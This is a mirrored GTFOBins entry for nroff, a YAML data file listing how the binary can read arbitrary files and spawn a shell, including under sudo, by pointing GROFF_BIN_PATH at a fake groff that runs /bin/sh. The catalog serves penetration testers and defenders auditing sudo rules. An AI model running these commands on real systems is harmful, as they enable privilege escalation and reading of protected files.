mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2026-03-07 06:31:33 +01:00
21 lines
365 B
Plaintext
21 lines
365 B
Plaintext
---
|
|
functions:
|
|
file-read:
|
|
- binary: false
|
|
code: |-
|
|
nroff /path/to/input-file
|
|
comment: |-
|
|
The file is typeset and some warning messages may appear.
|
|
contexts:
|
|
sudo:
|
|
unprivileged:
|
|
shell:
|
|
- code: |-
|
|
echo /bin/sh >groff
|
|
chmod +x groff
|
|
GROFF_BIN_PATH=. nroff
|
|
contexts:
|
|
sudo:
|
|
unprivileged:
|
|
...
|